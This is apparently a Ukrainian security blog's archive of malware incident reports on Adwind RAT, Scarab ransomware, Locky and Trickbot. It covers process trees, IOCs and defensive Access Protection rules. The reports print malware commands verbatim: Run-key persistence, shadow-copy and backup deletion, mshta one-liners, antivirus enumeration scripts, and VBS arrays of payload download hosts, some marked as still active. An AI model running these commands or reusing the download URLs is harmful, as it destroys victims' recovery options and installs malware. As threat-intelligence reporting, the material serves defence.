Tag Archive | vbs

IOC_Adwind_100518

Доброго вечора, панове.

Вчора була зафіксована розсилка шкідливого коду типу #Adwind (RAT).

Ми вже кілька разів розбирали його різні варіації.

#Adwind застосовується для збору інформації та віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі використовують JRE та альтернативні поштові клієнти* чи WebMail, – високий.

А для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

  • Сервер розсилки імітує домен Інституту зварювання ім. Патона
  • (!) актуальні версії MS Outlook по замовчуванню блокують доступ до приєднань цього типу
  • #Adwind не створює нових запускних файлів крім копії модулів JRE
  • Активно використовує WSH та WMI
  • Не потребує прав Адміністратора
  • Може бути каналом доставки іншого malware
  • Цього разу Jar без обгортки

Схема атаки:

email > Attach (jar) > javaw.exe > java.exe > cscript.exe> WMIC.exe > data exfiltration

Маркери IOC:

Основна частина:

SHA-256        8dd7c604013ca7bdabba34ab04291a85ffb9846063de0efb17f8bf2d0a7e04e8
File name   uba.qrypted.jar (18ZJ127 INV (2).jar)
File size      769.07 KB

Мережеві IOC:

Трафік інфікованої системи:

java.exe    1284 TCP   127.0.0.1   49794        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  840   TCP   10.0.2.15   49754        185.227.83.51   5030 ESTABLISHED      

 

java.exe    1284 TCP   APM11       49796        localhost    7777 SYN_SENT                                                                         
javaw.exe  840   TCP   apm11       49754        51.83.227.185.gerber.non-logging.vpn       5030 ESTABLISHED

Активність по процесам:

Коли жертва відкриває JAR файл, відбувається обробка інструкцій і закріплення бекдору:

"C:\Program Files (x86)\Microsoft Office\Office12\OUTLOOK.EXE" /f "C:\Users\operator\Desktop\RE New Order # 014563.msg"
"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\tmp\Temporary Internet Files\Content.Outlook\RBXHTDD1\18ZJ127 INV (2).jar"
"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.96591224716123398063543837287709600.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1028621641851654372.vbs
cscript.exe  C:\tmp\Retrive1028621641851654372.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1863584818779134903.vbs
cscript.exe  C:\tmp\Retrive1863584818779134903.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e
"cmd.exe" /C cscript.exe C:\tmp\Retrive7838850603346017630.vbs
cscript.exe  C:\tmp\Retrive7838850603346017630.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1695544840638860067.vbs
cscript.exe  C:\tmp\Retrive1695544840638860067.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

Таким чином, файли інтерпретатора Java копіюються із \Program Files у каталог профіля користувача.

Після цього проходить закріплення через HKU\Current Version\Run

(!) Зверніть увагу – до списку автозавантаження додається легітимний процес JRE, шкідливі команди передаються параметром:

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OQZJaDzMiFp /t REG_EXPAND_SZ /d
"\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA\"" /f

Щоб приховати сліди, Adwind змінює атрибути робочого каталогу:

"attrib" +h "C:\Users\operator\DUsCXQFVGan\*.*"
"attrib" +h "C:\Users\operator\DUsCXQFVGan"

Після закріплення розпочинається збір інформації:

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.72519027776652135739829391954449646.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1356326019894555462.vbs
cscript.exe  C:\tmp\Retrive1356326019894555462.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive4827650205509862735.vbs
cscript.exe  C:\tmp\Retrive4827650205509862735.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5797923481866821519.vbs
cscript.exe  C:\tmp\Retrive5797923481866821519.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5311907378487770237.vbs
cscript.exe  C:\tmp\Retrive5311907378487770237.vbs
"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Видалення JRE там, де він не є необхідним по роботі
  • Заборона створення/запису .jar файлів у каталозі користувача
  • Блокування доставки файлів типу JAR на рівні Web та Email шлюзів
  • Заборона створення/зчитування vbs файлів або ж повна деактивація механізму WSH
  • Заборонити процесу javaw зчитувати файли з каталогу користувача
  • Суворий контроль переліку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\ – дозволить упередити копіювання файлів JRE
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR
Advertisements

IOC_Adwind_070218

Доброго вечора, панове.

Сьогодні зранку зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Ми з ним уже “знайомі”: розибрав у червні 16го, у травні 17го, на початку вересня 17го та 12го жовтня.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Цього разу примітивно, без обгортки, просто JAR у приєднанні.

Рейтинг приманки на VT jar – 9/60.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схема атаки:

email > .JAR > %temp%\*.JAR, *.class & *.vbs > %Userprofile%\EALtjyLyxBW\

Маркери IOC:

File name   SKMBT_C02072018.jar
SHA-256        abd38eea774ca43a7df3d4e173b07fcee809e2bb0d9ae6d8fd7021610938e7ce
File size      534.01 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\decoded.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

 

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.92849276228029881768736636918737462.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive8012862021299542926.vbs
cscript.exe  C:\tmp\Retrive8012862021299542926.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

 

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

 

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NjLVawaQVWM /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx\"" /f
=
NjLVawaQVWM   Java(TM) Platform SE binary  Oracle Corporation        c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  21.06.2013 22:05               

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\EALtjyLyxBW\*.*"
"attrib" +h "C:\Users\operator\EALtjyLyxBW"

– приховує свої файли через атрибути файлової системи

 

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.482691304425191373098301473738213403.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive5796149169918309765.vbs
cscript.exe  C:\tmp\Retrive5796149169918309765.vbs

– передача керування на файл з інструкціями з каталогу користувача

 

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""AV"":""" & .displayName & """}"
 End With
Next

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
 End With
Next
 

– збір інформації про

  • встановленні драйвери PnP пристроїв
  • антивірусне ПЗ
  • брандмауер

(!) може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю.

Мережеві IOC:

Мережева активність при інфікуванні – спроба з’єднатися із вузлом в TOR

DNS  102   Standard query response 0xe7ab A vvrhhhnaijyj6s2m[.]onion[.]top A 62.0.58.94

Трафік скомпрометованої системи:

java.exe    2208 TCP   127.0.0.1   49359        127.0.0.1   7777 SYN_SENT                                                                         
java.exe    1592 TCP   127.0.0.1   49362        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  1464 TCP   10.0.2.15   49291        185.158.139.39 5017 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

  1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
  2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
  3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
  4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
  5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
  6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування JAR файлів на рівні каналів передачі Web та Email
  • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
  • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Scarab_231117

Доброго дня, панове.

Звіт стосується розсилок Scarab Ransomware, які відбувалися на минулому тижні. Публікую для академічного розгляду оскільки:

Рівень загрози – нижче середнього. Для тих, хто прислухався до моїх рекомендаційнизький.

Звернень по цьому типу мені не надходило, а кім того, технічно механізм інфікування Scarab не відрізняється від інших (Locky, Cerber), які я вже розглядав.

Проте зважаючи на те, яку увагу (з подачі Кіберполіції) ЗМІ приділили розсилкам саме цього зразка – вирішив усе ж таки його розібрати.

Не без того, щоб вкотре нагадати вам прості та дієві методи захисту.

Трохи аналітики:

  • Шифрування стійке. На даний момент способу відновити файли – не знайдено
  • Факти інфікування даним класом шкідливого коду говорять про низький рівень обізнаності
  • Scarab спричинив багато галасу, бо на відміну від Locky, він шифрує одразу без перевірки умов, ще раз – Scarab шифрує завжди там, де був запущений
  • А це значить, що жертви Scarab ігнорували попередні інциденти тому що, розсилки з Locky не призводили до шифрування
  • Метод доставки – масовий, неперсоніфікований, нелокалізований, низькоякісний фішинг типу “відскановані документи”
  • Тип приманки – необфусковані VBS скрипти в архівах 7zip
  • Скрипти містять від 2 до 3 посилань на завантаження основної частини
  • Активація та шифрування відбуваються з правами користувача і можуть проходити без мережевих з’єднань (offline)
  • Ім’я основної частини чітко задане кодом скрипту і не змінюється
  • Перед початком шифрування зразок намагається видалити Shadow Copy, якщо права не надавати – шифрування продовжиться, просто без видалення тіньових копій

Схема атаки:

email > Attach 7z (VBS) > WSCript > GET JHgd476? > %temp%\VJMAQASU.exe

Маркери IOC:

приклади листів:

один із скриптів-приманок:

File name image2017-11-22-5379282.vbs
SHA-256 fd072a6c2fe9187f799a27e21c27fc67dd2f145ccbc0faa917f37469d0d26974
File size 3.8 KB

містить три посилання на завантаження основної частини:

krapivec = Array("miamirecyclecenters[.]com/JHgd476?","pamplonarecados[.]com/JHgd476?","hard-grooves[.]com/JHgd476?")

Останнє – досі активно і на звернення видає основну частину:

File name JHgd476  >> %temp%\VJMAQASU.exe
SHA-256 7a60e9f0c00bcf5791d898c84c26f484b4c671223f6121dc3608970d8bf8fe4f
File size 356.5 KB

Приклад запуску без надання привілеїв:

Приклад запуску із наданням привілеїв через UAC:

Запуск скрипту приводить до завантаження основної частини за шляхом %temp%\VJMAQASU.exe

"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\image2017-11-22-5379282.vbs" 
"C:\Windows\System32\cmd.exe" /c call "C:\tmp\VJMAQASU.exe"
"C:\tmp\VJMAQASU.exe"

Після запуску Scarab через cmd.exe копіює своє тіло у %AppData%\Roaming\sevnz.exe

Та намагається отримати підвищення привілеїв для видалення тіньових копій (UAC)

Якщо йому це вдається, він копіює своє тіло ще раз у %AppData%\Roaming але вже для адміністративного облікового запису

"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\operator\AppData\Roaming\sevnz.exe"
"C:\tmp\VJMAQASU.exe" runas
"C:\Windows\system32\cmd.exe" /c copy /y "C:\tmp\VJMAQASU.exe" "C:\Users\support\AppData\Roaming\sevnz.exe"
"C:\Users\support\AppData\Roaming\sevnz.exe"

Далі через mshta за допомогою javascript команд Scarab додає в автозавантаження посилання на замітку про викуп і ініціює видалення тіньових копій:

mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\uSjBVNE',i);}catch(e){}},10);"
mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\STYRX\\OCDPR'));close();"
"C:\Windows\System32\cmd.exe" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
"C:\Windows\System32\cmd.exe" /c wmic SHADOWCOPY DELETE
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\cmd.exe" /c vssadmin Delete Shadows /All /Quiet
vssadmin  Delete Shadows /All /Quiet
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

В фоні відбувається шифрування через послідовний перезапис файлів процесом AppData\Roaming\sevnz.exe

По завершенню шифрування Scarab відкриває файл із заміткою про викуп та ініціює видалення свого тіла (за обома шляхами – temp та appdata)

C:\Windows\system32\cmd.exe /c start /max notepad.exe "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
notepad.exe  "C:\Users\support\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('sevnz.exe');close()}catch(e){}},10);"
mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('VJMAQASU.exe');close()}catch(e){}},10);"

Зашифровані файли отримують розширення .[suupport(@)protonmail[.]com].scarab

Шифрування невеликої кількості документів зайняло ~5-7 хвилин

Частина замітки про викуп:

__________________________________________________________________________________________________
|                                                                                                  |
|                 *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS ***                 |
|__________________________________________________________________________________________________|

Your files are now encrypted!

-----BEGIN PERSONAL IDENTIFIER-----
123oin123njnjndoiqn2oenq2oindiqndkqndknwqkndkawndkawndkl
-----END PERSONAL IDENTIFIER-----

All your files have been encrypted due to a security problem with your PC.

Мережеві IOC:

завантаження основного тіла Scarab:

5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1 
98.124.251.75:80      HTTP 375 atlantarecyclingcenters[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.165.149:80      HTTP 372 hellonwheelsthemovie[.]com GET /JHgd476? HTTP/1.1
98.124.251.75:80      HTTP 371 miamirecyclecenters[.]com GET /JHgd476? HTTP/1.1
5.2.88.79:80            HTTP 367 pamplonarecados[.]com GET /JHgd476? HTTP/1.1
66.36.173.111:80      HTTP 364 hard-grooves[.]com GET /JHgd476? HTTP/1.1 (досі активний)

відправка даних про Public IP

88.99.66.31:80       HTTP 101 iplogger[.]co GET /18RtV6.jpg HTTP/1.1 - передача через cookie

Що можна було зробити аби уникнути інфікування ?

  1. Фільтр скриптових приєднань (VBS, JS, JSE, WSF..)
  2. Заборона завантаження скриптових та запусних файлів (payload у Scarab не шифрований)
  3. Заборона створення VBS та EXE в каталозі профілю користувача (приклади правил наведені нижче)
  4. Деактивація механізму Windows Scritp Host (другий варіант)
  5. Або блокування вихідного трафіку для процесів WSCritp та CSCript (перший варіант)

Приклади правил Access Protection (McAfee VSE, McAfee ENS):

Заборона створення запускних файлів

Name: _exe_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.EXE
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Заборона створення скриптових файлів (увага! приклад тільки для VBS, рекомендується продублювати правила для JS, JSE, WSF)

Name: _VBS_prof_BLK
Process to include: *
Processes to exclude: -
File or folder name to block: **\Users\*\**\*.VBS
File actions to prevent:
+ Read
+ Write
+ Create
+ Execute

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/створення/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Еволюція скриптів

До того, що скрипти-приманки можуть містити кілька зпасних посилань ми вже звикли.

Також звикли до перевірки Public IP та вибору з двох гілок завантажень.

Сьогодні ботнет Necurs розповсюджував новий варіант VBS скрипта, активація кого призводила до завантаження payload лише за певних умов:

File name: Invoice 89533683 10.18.2017.vbs
SHA-256: f166c84f7b732c380fd4a73540eec12d74290a04155edad7a1f4848811090867
File size 10.37 KB

Скрипт виконує збір параметрів про ОС та надсилає їх через POST запит

"POST", "http://haddownding.net/trtrtr.php",false [163.172.153.154]

В залежності від відповіді на цей запит скрипт або отримує адресу на завантаження payload або ж завершується.

Скрипт який потрапив мені сьогодні до рук буув орієнтований на системи з двох країн

так машини із США отримували
niv785yg _ Locky
Filename niv785yg
Size 623KiB (637952 bytes)
SHA256 64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484
dbatee[.]gr/niv785yg
goliathstoneindustries[.]com/niv785yg
3overpar[.]com/niv785yg
pciholog[.]ru/niv785yg
disfrance[.]net/p66/niv785yg
а системи з Великобританії
iuty56g _ Trickbot
Filename iuty56g.exe
Size 393KiB (401920 bytes)
SHA256 9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b
envi-herzog[.]de/iuty56g
pac-provider[.]com/iuty56g
pesonamas.co[.]id/iuty56g
disfrance[.]net/p66/iuty56g

Природньо що на моїй тестовій системі скрипт завершився одразу.

Дані про джерела були взяті з блогу My Online Security

Варто бути готовим до того, що схожі скрипти перепишуть та переорієнтують на український сектор.

Тому краще заздалегіть вжити відповідних заходів, а саме:

Контрзаходи: (прості але дієві)

  • Перевірка журналів мережевого обладнання по наданим маркерам (звертайте увагу не стільки на конкретні URL як на коди GET запитів)
  • Блокування доступу до мережі Інтернет для процесів WScript.exe, CScript.exe, Powershell.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й) – радикально проте раз і назважди
  • Заборона створення та зчитування/запуску *.JS*, *.VB*, *.WS*, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !

Для оптимального захисту:

  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_vbs_asorti_111017

Доброго дня, панове.

Вчора було зафіксовано спроби доставки Locky Ransomware та Trickbot.

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Трохи аналітики:

  • схожа розсилка вже проходила 28 версеня
  • скрипти містять 6 посилань на два різних payload (два Locky та trickbot)
  • адреси на  завантаження payload не обфусковані, проте додана перевірка коду країни
  • в залежності від приналежності public IP використовується одна з двох гілок URL
  • слід остерігатися появи схожих скриптів із обфускацією та завантаженням payload по HTTPS
  • Користувачі захисту кінцевих точок McAfee (VSE/ENS) зауважте, що dropper та payload Trickbot детектуються по GTI.

Схема атаки:

email > Attach (7z) > VBS > Country by IP? > choose URL > GET > %temp%\random.exe

Маркери IOC:

File Name F9785396895.vbs
SHA-256 30f064b3c28ba251ab30f77337724a0d449d12943720697bb06ce5999f2b6520

перевірка зовнішньої адреси:

dataUrls = Array(“http://freegeoip.net/json/“,”http://www.geoplugin.net/json.gp“,”https://ipinfo.io/json“)

дві гілки завантажень

ZimZamZum = Array("globoart.es/jhbfvg7?","fetchstats.net/p66/jhbfvg7","teracom.co.id/jhbfvg7?") 
Else
ZimZamZum = Array("missinglynxsystems.com/8y6ghhfg?","fetchstats.net/p66/8y6ghhfg","eurecas.org/8y6ghhfg?")
End If

по типам payload:

jhbfvg7 – trickbot

Filename nrbob.exe

SHA256  5553f1e00e182ca5a4aa58c7f0fecb0b7a81b697f04d8194121e818358cf2196Copy SHA256 to clipboard

8y6ghhfg – Locky

Filename BKAoQKtgfOM.exe

SHA256  c35f705df9e475305c0984b05991d444450809c35dd1d96106bb8e7128b9082fCopy SHA256 to clipboard

По зразкам Locky – поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

По trickbot – після запуску дублює своє тіло у

C:\Users\operator\AppData\Roaming\winapp\random.exe

Закріплюється через задачу системного планувальника

\services update c:\users\operator\appdata\roaming\winapp\random.exe

запускає новий екземпляр svchsot та інжектує себе у нього

C:\Windows\system32\svchost.exe > svchost.exe -k netsvcs

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

перевірка зовнішньої адреси

104.31.11.172 80 HTTP 460 freegeoip.net GET /json/ HTTP/1.1 
178.237.36.10 80 HTTP 466 www.geoplugin.net GET /json.gp HTTP/1.1
172.217.20.174 443 TCP 54 49377 → 443 [ACK] Seq=204 Ack=2837 Win=64240 Len=0 (HTTPS)

завантаження Trickbot

86.109.170.198 80 HTTP 290 globoart.es GET /jhbfvg7? HTTP/1.1 (+) Trickbot
91.225.48.94 80 HTTP 296 fetchstats.net GET /p66/jhbfvg7 HTTP/1.1 (+) Trickbot
202.169.44.149 80 HTTP 292 teracom.co.id GET /jhbfvg7? HTTP/1.1  (-) 404 Not Found

трафік після активації Trickbot

49.51.134.78 80 HTTP 100 unhanorarse.info POST /tr554.php HTTP/1.1  (application/x-www-form-urlencoded)

завантаження Locky

66.36.173.181 80 HTTP 302 missinglynxsystems.com GET /8y6ghhfg? HTTP/1.1 (-) 403 
91.241.236.102 80 HTTP 297 fetchstats.net GET /p66/8y6ghhfg HTTP/1.1 (+) Locky
185.58.7.11 80 HTTP 291 eurecas.org GET /8y6ghhfg? HTTP/1.1 (+) Locky

Контрзаходи:

  • Перевірка журналів мережевого обладнання по наданим маркерам
  • Блокування доступу до мережі Інтернет для процесу WScript.exe (варіант 1й)
  • Деактивація механізму Windows Script Host (варіант 2й)
  • Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Locky_05-061017

Доброго дня, панове.

В черговий раз фіксуємо спроби доставки Locky Ransomware (вже розглядав , та ).

Рівень загрози – середній, для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Доставка – через необфусковані VBS скрипти у оболонці 7z.

Подробиці:

На аналіз були надані два зразки скриптів, які відносяться до однієї кампанії.

Їх активація призводить до завантаження одного й того ж зразка.

Скрипти містять по 3 посилання, перевірки коду країни не виявлено.

GET запити не відрізаються. Частина посилань досі активна!

Користувачі захисту McAfee, зверніть увагу на дві речі:

  • payload детектується по GTI
  • репутація посилань низька – блок на MWG, NSP та WebControl

Схема атаки:

email > Attach (7z) > VBS > 3 URL > HTTP GET > %temp%\random.exe

Маркери IOC:

File Name Invoice_INV000267.vbs
SHA-256 Hash Identifier 158851690993F35C542E43FEF8747487AF7DFDC2C7051F98AF8469EE287AC8A0
File Size 11829 bytes
File Type ASCII text

Plyask = Array("bnphealthcare.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","balzantruck.com/9hgfdfyr6?")

 

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
69.156.240.29        balzantruck.com         GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний

завантаження >

File Name WwLlYA.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

другий скрипт

File Name Invoice_INV000104.vbs
SHA-256 Hash Identifier 919260CC38BF4F7B7BA93F716BA1D12DB4CDEF597F0A94C9036B8F8A16D99BCB
File Size 11743 bytes
File Type ASCII text

Plyask = Array("balzantruck.com/9hgfdfyr6?","mrscrowe.net/p66/9hgfdfyr6","georginabringas.com/9hgfdfyr6?")

 

69.156.240.29      balzantruck.com          GET /9hgfdfyr6? HTTP/1.1 HTTP (-) не доступний
178.136.206.128   mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
40.76.209.29        georginabringas.com   GET /9hgfdfyr6? HTTP/1.1 HTTP (+) досі активний

завантаження >

File Name iYwHXKr.exe
SHA-256 Hash Identifier 33B62B95281BB0ECBAD2523BB99E4853FD516044B8F2B42EF4A1E29903E7BD0F
File Size 593920 bytes

По зразкам поведінка стандартна – після активації перевірка параметрів системи, шифрування не розпочате, самознищення, мережеві комунікації відсутні.

Що можна було зробити аби уникнути інфікування ?

  1. Завантаження архіву із скриптом можна було завадити через блокування VBS та JS на proxy (як приклад через composite opener in Web Gateway)
  2. Запис VBS, JS приманки на диск (розпаковку) можна було попередити заборонивши створення VBS, JS файлів в профілі користувача (групові політики або Access Protection Rules)
  3. Запуск VBS, JS приманки можна було зупинити через деактивацію механізму Windows Script Host (зміна одного ключа реєстру)
  4. Завантаження основного коду можна було зупинити блокуванням мережевих з’єднань для процесу WSCript.exe (одне правило вбудованого брандмауера)
  5. Створення та подальший запуск основного тіла можна було заборонити блокуванням створення та запуск .exe файлів у каталозі профілю %Userprofile% (групові політики або Access Protection Rules)

Таким чином, як бачите, до запуску основного тіла було 5 кроків, упередження хоча би одного з них = зупинка атаки.

Мережеві IOC:

досі активні

202.169.44.152      bnphealthcare.com       GET /9hgfdfyr6? HTTP/1.1 HTTP (+)   досі активний
217.175.10.144      mrscrowe.net             GET /p66/9hgfdfyr6 HTTP/1.1 HTTP (+) досі активний
